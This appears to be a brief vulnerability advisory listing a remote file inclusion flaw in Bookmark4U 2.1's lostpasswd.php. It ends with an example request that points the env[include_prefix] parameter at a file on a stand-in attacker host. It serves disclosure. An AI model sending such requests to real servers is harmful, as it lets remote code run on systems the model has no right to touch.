Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28257
HistoryJul 09, 2012 - 12:00 a.m.

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

2012-07-0900:00:00
vulners.com
76

vendor - http://bookmark4u.sourceforge.net/
version - 2.1
solution - product discontinued

example -
http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://[attacker]/path/to/file.txt???